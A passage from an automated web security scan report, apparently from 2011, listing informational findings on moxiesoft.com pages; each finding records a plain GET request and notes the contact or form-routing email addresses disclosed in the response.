Content-Type: text/html; charset=utf-8
Content-Length: 37962


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.159. http://www.moxiesoft.com/tal_products/customer-spaces.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/customer-spaces.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_products/customer-spaces.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40034


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.160. http://www.moxiesoft.com/tal_products/email.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/email.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_products/email.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.161. http://www.moxiesoft.com/tal_products/employee-spaces.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/employee-spaces.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_products/employee-spaces.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.162. http://www.moxiesoft.com/tal_products/knowledgebase.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/knowledgebase.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_products/knowledgebase.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43802


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.163. http://www.moxiesoft.com/tal_products/phone.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/phone.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_products/phone.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40433


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.164. http://www.moxiesoft.com/tal_products/proactive_chat.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/proactive_chat.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_products/proactive_chat.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41702


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.165. http://www.moxiesoft.com/tal_products/proactivechatdemo/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/proactivechatdemo/

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_products/proactivechatdemo/ HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:00:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17230


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.166. http://www.moxiesoft.com/tal_products/products.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/products.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_products/products.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47513


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.167. http://www.moxiesoft.com/tal_products/request_demo.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/request_demo.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /tal_products/request_demo.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:00:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51346


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<input type="hidden" name="send_to" value="cimleads@ngenera.com">
...[SNIP]...
<input type="hidden" name="autorespond_from" value="noreply@ngenera.com">
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.168. http://www.moxiesoft.com/tal_products/request_quote.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/request_quote.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /tal_products/request_quote.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:00:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51705


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<input type="hidden" name="send_to" value="cimleads@ngenera.com" />
...[SNIP]...
<input type="hidden" name="autorespond_from" value="noreply@ngenera.com" />
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.169. http://www.moxiesoft.com/tal_products/social-media.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/social-media.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_products/social-media.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37917


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.170. http://www.moxiesoft.com/tal_resources/content.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_resources/content.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_resources/content.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24096


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.171. http://www.moxiesoft.com/tal_resources/resource_center.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_resources/resource_center.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_resources/resource_center.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 61613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.172. http://www.moxiesoft.com/tal_services/advisory-services.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_services/advisory-services.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_services/advisory-services.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:03:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35768


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.173. http://www.moxiesoft.com/tal_services/hosting.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_services/hosting.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_services/hosting.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:03:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 27634


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.174. http://www.moxiesoft.com/tal_services/implementation.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_services/implementation.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_services/implementation.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:03:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 29539


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.175. http://www.moxiesoft.com/tal_services/services.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_services/services.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_services/services.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:03:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28338


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.176. http://www.moxiesoft.com/tal_services/training.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_services/training.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_services/training.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30222


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...
